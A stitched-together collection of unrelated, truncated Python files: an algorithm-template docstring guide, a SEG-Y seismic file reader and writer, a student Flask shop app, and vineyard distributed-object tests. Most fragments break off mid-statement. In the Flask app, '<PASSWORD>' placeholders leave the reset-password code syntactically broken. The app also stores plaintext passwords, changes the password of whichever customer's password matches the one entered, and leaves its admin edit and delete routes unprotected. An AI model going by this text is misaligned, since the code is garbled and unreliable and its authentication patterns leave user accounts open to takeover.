Docstrings for classes, functions, properties, and attributes alike should
follow standard rst, google, or numpy docstring formats such that they are
compatible with sphinx autodocumentation
The primary docstring for the algorithm should also document its __init__
function if it has been overridden. Include a parameters section inside
the class docstring for parameters taken in for __init__.
All Algorithms seeking publication should be properly type annotated.
Parameters:
template_requires:
An example of a parameter that an algorithm may require during
instantiation to initialize some class setting or control behavior.
This example sets a private attribute that underlies the function
of the algorithm's 'template_property' property. This is a fairly
standard use case.
"""
def __init__(self, *args: Any, template_requires: Any, **kwargs: Any) -> None:
"""
Shows how to create and document an __init__ function for an algorithm
Documentation for init functions in algorithms should be included in the
algorithm's main docstring below the class definition. Be sure to
document all new parameters thoroughly, as well as any extra
initialization behavior. Docstrings for __init__, as well as other
dunder methods, are not required unless they perform unexpected
behavior.
"""
self._prop = template_requires
super().__init__(*args, **kwargs)
def setup(self, **kwargs: Any) -> ag.Environment:
"""
Shows how to create and document a setup function
The setup function should be capable of accepting 'start' and 'end'
keyword arguments, so if you don't accept those directly, you must
accept **kwargs. They will additionally be passed any arguments that
are passed to the algorithm's __call__ method.
Setup functions should always return an environment object which will be
bound to the Algorithm's 'env' attribute. This occurs when the
algorithm is instantiated, as well as before every backtest.
Documentation for setup functions should primarily concern what kind
of environment is being set up, and why the instantiated assets are
required. Why are certain assets or asset classes being used? How
does the algorithm take advantage of them? If there are multiple
portfolios in the environment, why, and what is the purpose of each one?
Questions like this should be answerable from a reading the setup
docstring.
Parameters:
example:
Include any additional parameters required by the setup function
in their own parameters section, using this format.
"""
return ag.Environment()
def cycle(self, **kwargs: Any) -> None:
"""
Shows how to create and document a cycle function
The cycle function should be capable of accepting 'start' and 'end'
keyword arguments, so if you don't accept those directly, you must
accept **kwargs. They will additionally be passed any arguments that
are passed to the algorithm's __call__ method.
Cycle functions should have no return value; their goal is to modify the
Algorithm's | |
longer ' + \
'than 3200 bytes'
raise SEGYWritingError(msg)
# Assert the encoding.
enc = self.textual_header_encoding.upper()
# Make sure revision number and end header marker are present. If
# not: add them - if something else is already present, raise a
# warning but don't do anything.
# Make sure the textual header has the required fields.
revision_number = textual_header[3200-160:3200-146].decode()
end_header_mark = textual_header[3200-80:3200-58]
if revision_number != "C39 SEG Y REV1":
if revision_number.strip() in ("", "C", "C39"):
textual_header = textual_header[:3200-160] + \
b"C39 SEG Y REV1" + textual_header[3200-146:]
else:
# Raise warning but don't do anything.
msg = ("The revision number in the textual header should be "
"set as 'C39 SEG Y REV1' for a fully valid SEG-Y "
"file. It is set to '%s' which will be written to the "
"file. Please change it if you want a fully valid file."
% revision_number)
warnings.warn(msg, SEGYInvalidTextualHeaderWarning)
desired_end_header_mark = b"C40 END TEXTUAL HEADER" if enc == "ASCII" \
else b"C40 END EBCDIC "
if end_header_mark != desired_end_header_mark:
if end_header_mark.strip() in (b"", b"C", b"C40"):
textual_header = textual_header[:3200-80] + \
desired_end_header_mark + textual_header[3200-58:]
else:
# Raise warning but don't do anything.
msg = ("The end header mark in the textual header should be "
"set as 'C40 END TEXTUAL HEADER' or as "
"'C40 END EBCDIC ' for a fully valid "
"SEG-Y file. It is set to '%s' which will be written "
"to the file. Please change it if you want a fully "
"valid file."
% end_header_mark.decode())
warnings.warn(msg, SEGYInvalidTextualHeaderWarning)
# Finally encode the header if necessary.
if enc == 'ASCII':
pass
elif enc == 'EBCDIC':
textual_header = \
textual_header.decode('ascii').encode('EBCDIC-CP-BE')
# Should not happen.
else:
msg = 'self.textual_header_encoding has to be either ASCII or ' + \
'EBCDIC.'
raise SEGYWritingError(msg)
file.write(textual_header)
def _read_traces(self, unpack_headers=False, headonly=False,
yield_each_trace=False):
"""
Reads the actual traces starting at the current file pointer position
to the end of the file.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the file.
Defaults to False.
:type yield_each_trace: bool
:param yield_each_trace: If True, it will yield each trace after it
has been read. This enables a simple implementation of a
streaming interface to read SEG-Y files. Read traces will no
longer be collected in ``self.traces`` list if this is set to
``True``.
"""
self.traces = []
# Determine the filesize once.
if isinstance(self.file, io.BytesIO):
pos = self.file.tell()
self.file.seek(0, 2) # go t end of file
filesize = self.file.tell()
self.file.seek(pos, 0)
else:
filesize = os.fstat(self.file.fileno())[6]
# Big loop to read all data traces.
while True:
# Read and as soon as the trace header is too small abort.
try:
trace = SEGYTrace(self.file, self.data_encoding, self.endian,
unpack_headers=unpack_headers,
filesize=filesize, headonly=headonly)
if yield_each_trace:
yield trace
else:
self.traces.append(trace)
except SEGYTraceHeaderTooSmallError:
break
class SEGYBinaryFileHeader(object):
"""
Parses the binary file header at the given starting position.
"""
def __init__(self, header=None, endian='>'):
"""
"""
self.endian = endian
if header is None:
self._create_empty_binary_file_header()
return
self._read_binary_file_header(header)
def _read_binary_file_header(self, header):
"""
Reads the binary file header and stores every value in a class
attribute.
"""
pos = 0
for item in BINARY_FILE_HEADER_FORMAT:
length, name, _ = item
string = header[pos: pos + length]
pos += length
# Unpack according to different lengths.
if length == 2:
format = ('%sh' % self.endian).encode('ascii', 'strict')
# Set the class attribute.
setattr(self, name, unpack(format, string)[0])
# Update: Seems to be correct. Two's complement integers seem to be
# the common way to store integer values.
elif length == 4:
format = ('%si' % self.endian).encode('ascii', 'strict')
# Set the class attribute.
setattr(self, name, unpack(format, string)[0])
# The other value are the unassigned values. As it is unclear how
# these are formatted they will be stored as strings.
elif name.startswith('unassigned'):
# These are only the unassigned fields.
format = 'h' * (length // 2)
# Set the class attribute.
setattr(self, name, string)
# Should not happen.
else:
raise Exception
def __str__(self):
"""
Convenience method to print the binary file header.
"""
final_str = ["Binary File Header:"]
for item in BINARY_FILE_HEADER_FORMAT:
final_str.append("\t%s: %s" % (item[1],
str(getattr(self, item[1]))))
return "\n".join(final_str)
def _repr_pretty_(self, p, cycle):
p.text(str(self))
def write(self, file, endian=None):
"""
Writes the header to an open file like object.
"""
if endian is None:
endian = self.endian
for item in BINARY_FILE_HEADER_FORMAT:
length, name, _ = item
# Unpack according to different lengths.
if length == 2:
format = ('%sh' % endian).encode('ascii', 'strict')
# Write to file.
file.write(pack(format, getattr(self, name)))
# Update: Seems to be correct. Two's complement integers seem to be
# the common way to store integer values.
elif length == 4:
format = ('%si' % endian).encode('ascii', 'strict')
# Write to file.
file.write(pack(format, getattr(self, name)))
# These are the two unassigned values in the binary file header.
elif name.startswith('unassigned'):
temp = getattr(self, name)
if not isinstance(temp, bytes):
temp = str(temp).encode('ascii', 'strict')
temp_length = len(temp)
# Pad to desired length if necessary.
if temp_length != length:
temp += b'\x00' * (length - temp_length)
file.write(temp)
# Should not happen.
else:
raise Exception
def _create_empty_binary_file_header(self):
"""
Just fills all necessary class attributes with zero.
"""
for _, name, _ in BINARY_FILE_HEADER_FORMAT:
setattr(self, name, 0)
class SEGYTrace(object):
"""
Convenience class that internally handles a single SEG Y trace.
"""
def __init__(self, file=None, data_encoding=4, endian='>',
unpack_headers=False, filesize=None, headonly=False):
"""
Convenience class that internally handles a single SEG Y trace.
:param file: Open file like object with the file pointer of the
beginning of a trace. If it is None, an empty trace will be
created.
:param data_encoding: The data sample format code as defined in the
binary file header:
1:
4 byte IBM floating point
2:
4 byte Integer, two's complement
3:
2 byte Integer, two's complement
4:
4 byte Fixed point with gain
5:
4 byte IEEE floating point
8:
1 byte Integer, two's complement
Defaults to 4.
:type big_endian: bool
:param big_endian: True means the header is encoded in big endian and
False corresponds to a little endian header.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type filesize: int
:param filesize: Filesize of the file. If not given it will be
determined using fstat which is slow.
:param headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the file.
Defaults to False.
"""
self.endian = endian
self.data_encoding = data_encoding
# If None just return empty structure.
if file is None:
self._create_empty_trace()
return
self.file = file
# Set the filesize if necessary.
if filesize:
self.filesize = filesize
else:
if isinstance(self.file, io.BytesIO):
_pos = self.file.tell()
self.file.seek(0, 2)
self.filesize = self.file.tell()
self.file.seek(_pos)
else:
self.filesize = os.fstat(self.file.fileno())[6]
# Otherwise read the file.
self._read_trace(unpack_headers=unpack_headers, headonly=headonly)
def _read_trace(self, unpack_headers=False, headonly=False):
"""
Reads the complete next header starting at the file pointer at
self.file.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the | |
if session['admin_logged_in']:
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
session['username'] = "Admin"
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
db.close()
customer_list = []
if customer_dict:
for key in customer_dict:
customer = customer_dict.get(key)
customer_list.append(customer)
return render_template('customerAccount.html', count=len(customer_list), customer_list=customer_list)
else:
print("For Programmer: INFORMATION --> There are zero records")
return render_template('customerAccount.html', count=0)
except:
print("For Programmer: THREAT --> Someone is trying to break the system")
return redirect(url_for('error_render'))
# <--- End of Admin Account Management --->
# <--- Start of Customer Forget Password --->
@app.route('/forgetPassword', methods=['GET', 'POST'])
def forget_password():
forget_password_form = ForgetPasswordForm(request.form)
if request.method == 'POST' and forget_password_form.validate():
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
if customer_dict:
for key in customer_dict:
email = customer_dict[key].get_email()
firstname = customer_dict[key].get_firstName()
lastname = customer_dict[key].get_lastName()
# Email Validation (Check if email entered is in records)
if email == forget_password_form.email.data:
new_password = Email.Email(email, firstname, lastname)
customer_dict[key].set_password(new_password)
print('For Programmer: SUCCESS --> Password has been successfully changed')
# Set to true so that user will have to reset their password
customer_dict[key].set_reset_pass(True)
db['Customers'] = customer_dict
success = "An email have been sent to {}".format(forget_password_form.email.data)
return render_template('forgetPassword.html', form=forget_password_form, success=success)
else:
print("For Programmer: Invalid email")
error = "Invalid Email"
return render_template('forgetPassword.html', form=forget_password_form, error=error)
else:
# If dictionary was empty
print("For Programmer: ERROR --> No record found")
error = "Invalid Email"
return render_template('forgetPassword.html', form=forget_password_form, error=error)
db.close()
return render_template('forgetPassword.html', form=forget_password_form)
# <--- End of Customer Forget Password --->
# <--- Start of Customer Reset Password --->
@app.route('/resetPassword', methods=['GET', 'POST'])
def reset_password():
try:
if session['logged_in']:
reset_password_form = ResetPasswordForm(request.form)
if request.method == 'POST' and reset_password_form.validate():
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
for key in customer_dict:
password = customer_dict[key].get_password()
new_password = <PASSWORD>_password_form.confirm_password.data
# Current password validation (Check if current password entered by user matches in dictionary)
if password == reset_password_form.current_password.data:
customer_dict[key].set_password(<PASSWORD>)
customer_dict[key].set_reset_pass(False)
db['Customers'] = customer_dict
print("For Programmer: SUCCESS --> {} password has been changed".format(customer_dict[key].get_username()))
success = "Your password has been changed"
return redirect(url_for('customer_profile', success=success))
else:
print("For Programmer: ERROR --> Invalid Password")
error = "Invalid Password"
return render_template('resetPassword.html', form=reset_password_form, error=error)
return render_template('resetPassword.html', form=reset_password_form)
except:
print("For Programmer: THREAT --> Someone is trying to break the system")
return redirect(url_for('error_render'))
# <--- End of Customer Reset Password --->
# <------------------------------------------------------->
# <------------------ FAQ (Arif's Code) ------------------>
# <------------------------------------------------------->
@app.route('/FAQ', methods=['GET', 'POST'])
def faq():
faq_dict = {}
create_faq_form = CreateFaqForm(request.form)
try:
db = shelve.open('storage.db',
'c') # argument is 'c', so guaranteed that it will create, concerning a warning from another line
faq_dict = db["FAQ"]
except KeyError:
print("Error in retrieving storage.db, recreating storage.db.")
# Function below used multiple times, only for translation of data
def displayers(faq_dict_func):
q_list = []
u_count = 0
a_count = 0
for key in faq_dict_func:
question = faq_dict_func.get(key)
q_list.append(question)
if question.get_answer() == '':
u_count += 1
else:
a_count += 1
return q_list, u_count, a_count
if request.method == 'POST' and create_faq_form.validate():
if create_faq_form.question.data != '' and create_faq_form.answer.data == '':
faq_details = FAQ.FAQ(create_faq_form.question.data, session['username'])
faq_dict[faq_details.get_id()] = faq_details
create_faq_form.question.data = ''
db['FAQ'] = faq_dict
faq_dict = db['FAQ']
try:
faq = faq_dict[faq_details.get_id()]
print("\"" + str(faq.get_question()) + "\" question was stored in storage.db successfully with id ==",
faq.get_id())
except KeyError:
error = "Question failed to upload (KeyError). Log out and sign in again"
print("KeyError in retrieving latest input, likely it was blank. This error is expected.")
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
error=error)
except UnboundLocalError:
error = "Question failed to upload (UnboundLocalError). Log out and sign in again"
print("UnboundLocalError in retrieving latest input, likely it was blank. This error is expected.")
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
error=error)
else:
success = 'Your question has been uploaded! The admins will upload their answer soon within the week!'
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
success=success)
question_list, unanswered_count, answered_count = displayers(faq_dict)
db.close()
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count)
# <--- End of FAQ Display page with form --->
# <--- Start of FAQ answering page with form, for admin --->
@app.route('/FAQanswering/<int:id>/', methods=['GET', 'POST'])
def faqanswering(id):
faq_answer = CreateFaqForm(request.form)
if request.method == 'POST' and faq_answer.validate():
faq_dict = {}
db = shelve.open('storage.db', 'w')
faq_dict = db['FAQ']
faq = faq_dict.get(id)
# print(type(faq))
# print(faq)
faq.set_question(faq_answer.question.data)
faq.set_answer(faq_answer.answer.data)
db['FAQ'] = faq_dict
db.close()
return redirect(url_for('faq'))
else:
faq_dict = {}
db = shelve.open('storage.db', 'r')
faq_dict = db['FAQ']
db.close()
faq = faq_dict.get(id)
faq_answer.question.data = faq.get_question()
faq_answer.answer.data = faq.get_answer()
return render_template('faq_answering.html', form=faq_answer)
# <--- End of FAQ answering page with form, for admin --->
# <--- Start of FAQ deletion page, for admin --->
@app.route("/FAQdelete/<int:id>/", methods=['POST'])
def faqdelete(id):
faq_dict = {}
db = shelve.open("storage.db", 'w')
faq_dict = db["FAQ"]
faq = faq_dict.pop(id)
db['FAQ'] = faq_dict
db.close()
return redirect(url_for("faq"))
# <--- End of FAQ deletion page, for admin --->
# <------------------------------------------------------->
# <---------------------- <NAME> ----------------------->
# <------------------------------------------------------->
# StoreManage ViewProductStore
@app.route('/storeManage')
def store_manage():
print('load', flush=True)
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
products_list = []
for key in products_dict:
print(key, flush=True)
product = products_dict[key]
products_list.append(product)
print(product, flush=True)
print(products_list, flush=True)
return render_template('storeManage/storeManage.html', products_list=products_list)
# UploadProduct
@app.route('/uploadProduct', methods=['GET', 'POST'])
def upload_product():
print('upload', flush=True)
form = Createproduct()
Uploadfield = Uploadimage()
# form.validate()
# print(form.errors.items())
if form.validate_on_submit() and Uploadfield.validate_on_submit():
products_dict = {}
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except:
print("Error in retrieving Products from ProductStorage.db.")
image = request.files[Uploadfield.productImage.name]
# product is an object
product = Products.Products(form.productName.data, form.productPrice.data.quantize(Decimal("0.01")), form.productDescription.data, form.stock.data)
img_extension = image.filename.split('.')[-1]
print(img_extension)
image_name = str(product.get_products_id()) + '.' + str(img_extension)
print(image_name)
image.save(os.path.join(os.getcwd(), 'static', 'img', image_name))
product.set_image(image_name)
products_dict[product.get_products_id()] = product
db['Products'] = products_dict
db.close()
print(product.get_products_id(), flush=True)
return redirect(url_for('store_manage'))
return render_template('storeManage/uploadProduct.html', form=form, Uploadfield=Uploadfield)
# EditProduct
@app.route('/editProduct/<id>', methods=['GET', 'POST'])
def edit_product(id):
Editproduct = Createproduct()
print(id, flush=True)
print("Form done", flush=True)
if request.method == 'POST' and Editproduct.validate():
products_dict = {}
db = shelve.open('ProductStorage.db', 'w')
products_dict = db['Products']
product = products_dict.get(id)
image = request.files[Editproduct.updateImage.name]
# product is an object
if image.filename:
img_extension = image.filename.split('.')[-1]
image_name = str(product.get_products_id()) + '.' + str(img_extension)
print(image_name)
image.save(os.path.join(os.getcwd(), 'static', 'img', image_name))
product.set_image(image_name)
product.set_name(Editproduct.productName.data)
product.set_price(Editproduct.productPrice.data.quantize(Decimal("0.01")))
product.set_description(Editproduct.productDescription.data)
product.set_stock(Editproduct.stock.data)
db['Products'] = products_dict
db.close()
return redirect(url_for('store_manage'))
else:
products_dict = {}
db = shelve.open('ProductStorage.db', 'r')
products_dict = db['Products']
db.close()
product = products_dict.get(id)
image = product.get_image()
Editproduct.productName.data = product.get_name()
Editproduct.productPrice.data = product.get_price()
Editproduct.productDescription.data = product.get_description()
Editproduct.stock.data = product.get_stock()
return render_template('storeManage/editProduct.html', form=Editproduct, image=image)
# DeleteProduct
@app.route('/deleteProduct/<id>', methods=['POST'])
def delete_products(id):
products_dict = {}
db = shelve.open('ProductStorage.db', 'w')
products_dict = db['Products']
image = products_dict[id].get_image()
os.remove(os.path.join(os.getcwd(), 'static', 'img', image))
products_dict.pop(id)
db['Products'] = products_dict
db.close()
return redirect(url_for('store_manage'))
# ViewProductStore
@app.route('/storeView/<id>/', methods=['GET'])
def store_view(id):
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
product = products_dict[id]
return render_template('storeManage/storeView.html', product=product)
# ViewProductCustomer
@app.route('/customerView/<id>/', methods=['GET'])
def customer_view(id):
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
product = products_dict[id]
return render_template('storeManage/customerView.html', product=product)
# ViewStoreCustomer
@app.route('/customerProduct', methods=['GET'])
def customer_product():
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
products_list = []
for key in products_dict:
print(key, flush=True)
product = products_dict[key]
products_list.append(product)
print(product, flush=True)
print(products_list, flush=True)
return render_template('storeManage/customerProduct.html', products_list=products_list)
# <------------------------------------------------------->
# <---------------- Michael SHopping Cart ---------------->
# <------------------------------------------------------->
@app.route('/addCart/<id>/<int:qty>', methods=['GET'])
def addCart(id,qty):
try:
user_id = session['user_id']
product_id = id
quantity = qty
if request.method == 'GET':
product_dict = {}
try:
db = shelve.open('ProductStorage.db', 'r')
product_dict = db['Products']
except:
print("Error in retrieving Users from storage.db.")
item = product_dict[product_id]
cart_dict = {}
try:
db = shelve.open('cart.db', 'c')
cart_dict = db['cart']
except:
print("Error in retrieving Users from cart.db.")
inCartAlr = 0
user_cart = cart_dict.get(user_id)
for key in user_cart:
if product_id == key:
inCartAlr = 1
if inCartAlr == 1:
item = user_cart[product_id]
Nqty = item.add_qty(qty)
total = item.set_total(Nqty)
user_cart[item.get_products_id()] = item
cart_dict[user_id] = user_cart
db['cart'] = cart_dict
db.close()
else:
item.set_qty(qty)
total = item.set_total(qty)
user_cart[item.get_products_id()] = item
cart_dict[user_id] = user_cart
db['cart'] = cart_dict
db.close()
return redirect(url_for('Cart'))
| |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import json
import logging
import multiprocessing
import random
import threading
import time
import traceback
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pandas as pd
import pytest
import vineyard
from vineyard.core import default_builder_context
from vineyard.core import default_resolver_context
from vineyard.data import register_builtin_types
register_builtin_types(default_builder_context, default_resolver_context)
logger = logging.getLogger('vineyard')
def generate_vineyard_ipc_sockets(vineyard_ipc_sockets, nclients):
return list(itertools.islice(itertools.cycle(vineyard_ipc_sockets), nclients))
def generate_vineyard_ipc_clients(vineyard_ipc_sockets, nclients):
vineyard_ipc_sockets = generate_vineyard_ipc_sockets(vineyard_ipc_sockets, nclients)
return tuple(vineyard.connect(sock) for sock in vineyard_ipc_sockets)
def test_get_after_persist(vineyard_ipc_sockets):
client1, client2 = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 2)
data = np.ones((1, 2, 3, 4, 5))
o = client1.put(data)
client1.persist(o)
meta = client2.get_meta(o, True)
assert data.shape == tuple(json.loads(meta['shape_']))
def test_add_remote_placeholder(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
o2 = client2.put(data)
o3 = client3.put(data)
o4 = client4.put(data)
client4.persist(o4)
client3.persist(o3)
client2.persist(o2)
client1.persist(o1)
meta = vineyard.ObjectMeta()
meta['typename'] = 'vineyard::Sequence'
meta['size_'] = 4
meta.set_global(True)
meta.add_member('__elements_-0', o1)
meta.add_member('__elements_-1', o2)
meta.add_member('__elements_-2', o3)
meta.add_member('__elements_-3', o4)
meta['__elements_-size'] = 4
tup = client1.create_metadata(meta)
client1.persist(tup)
meta = client2.get_meta(tup.id, True)
assert meta['__elements_-size'] == 4
def test_add_remote_placeholder_with_sync(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
client1.persist(o1)
time.sleep(20)
o2 = client2.put(data)
client2.persist(o2)
time.sleep(20)
o3 = client3.put(data)
client3.persist(o3)
time.sleep(20)
o4 = client4.put(data)
client4.persist(o4)
time.sleep(20)
client1.get_meta(o4)
client2.get_meta(o1)
client3.get_meta(o2)
client4.get_meta(o3)
def test_remote_deletion(vineyard_ipc_sockets):
client1, client2 = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 2)
client1 = vineyard.connect(vineyard_ipc_sockets[0])
client2 = vineyard.connect(vineyard_ipc_sockets[1])
old_status = client1.status
data = np.ones((1, 2, 3, 4, 5))
o1 = client1.put(data)
client1.persist(o1)
new_status = client1.status
assert old_status.memory_limit == new_status.memory_limit
assert old_status.memory_usage != new_status.memory_usage
client2.get_meta(o1, sync_remote=True)
client2.delete(o1)
client1.sync_meta()
new_status = client1.status
assert old_status.memory_limit == new_status.memory_limit
assert old_status.memory_usage == new_status.memory_usage
def test_concurrent_blob(vineyard_ipc_sockets):
client1, client2, client3, client4 = generate_vineyard_ipc_clients(
vineyard_ipc_sockets, 4
)
# FIXME: test concurrent blob creation and destory
print(client1)
print(client2)
print(client3)
print(client4)
def test_concurrent_meta(vineyard_ipc_sockets): # noqa: C901
clients = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 4)
def job1(client):
try:
o = client.get_object(client.put(1))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job2(client):
try:
o = client.get_object(client.put(1.23456))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job3(client):
try:
o = client.get_object(client.put('xxxxabcd'))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job4(client):
try:
o = client.get_object(client.put((1, 1.2345)))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job5(client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
if random.random() > 0.5:
client.delete(o.id)
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
jobs = [job1, job2, job3, job4, job5]
with ThreadPoolExecutor(32) as executor:
fs, rs = [], []
for _ in range(1024):
job = random.choice(jobs)
client = random.choice(clients)
fs.append(executor.submit(job, client))
for future in fs:
rs.append(future.result())
if not all(rs):
pytest.fail("Failed to execute tests ...")
def test_concurrent_meta_mp(vineyard_ipc_sockets): # noqa: C901
num_proc = 8
job_per_proc = 64
vineyard_ipc_sockets = generate_vineyard_ipc_sockets(vineyard_ipc_sockets, num_proc)
def job1(rs, state, client):
try:
o = client.get_object(client.put(1))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job2(rs, state, client):
try:
o = client.get_object(client.put(1.23456))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job3(rs, state, client):
try:
o = client.get_object(client.put('xxxxabcd'))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job4(rs, state, client):
try:
o = client.get_object(client.put((1, 1.2345)))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def job5(rs, state, client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
# client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
print('failed with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
else:
rs.put((True, ''))
finally:
print('job finished', flush=True)
def start_requests(rs, state, ipc_socket):
jobs = [job1, job2, job3, job4, job5]
client = vineyard.connect(ipc_socket).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
job = random.choice(jobs)
job(rs, state, client)
ctx = multiprocessing.get_context(method='fork')
procs, rs, state = [], ctx.Queue(), ctx.Value('i', 0)
for sock in vineyard_ipc_sockets:
proc = ctx.Process(
target=start_requests,
args=(
rs,
state,
sock,
),
)
proc.start()
procs.append(proc)
for _ in range(num_proc * job_per_proc):
r, message = rs.get(block=True)
if not r:
pytest.fail(message)
def test_concurrent_persist(vineyard_ipc_sockets): # noqa: C901
clients = generate_vineyard_ipc_clients(vineyard_ipc_sockets, 4)
def job1(client):
try:
o = client.get_object(client.put(1))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job2(client):
try:
o = client.get_object(client.put(1.23456))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job3(client):
try:
o = client.get_object(client.put('xxxxabcd'))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job4(client):
try:
o = client.get_object(client.put((1, 1.2345)))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
def job5(client):
try:
o = client.get_object(client.put((1, 1.2345, 'xxxxabcd')))
client.persist(o.id)
if random.random() > 0.5:
client.delete(o.id)
else:
client.sync_meta()
except Exception as e: # pylint: disable=broad-except
pytest.fail('failed: %s' % e)
return False
return True
jobs = [job1, job2, job3, job4, job5]
with ThreadPoolExecutor(16) as executor:
fs, rs = [], []
for _ in range(256):
job = random.choice(jobs)
client = random.choice(clients)
fs.append(executor.submit(job, client))
for future in fs:
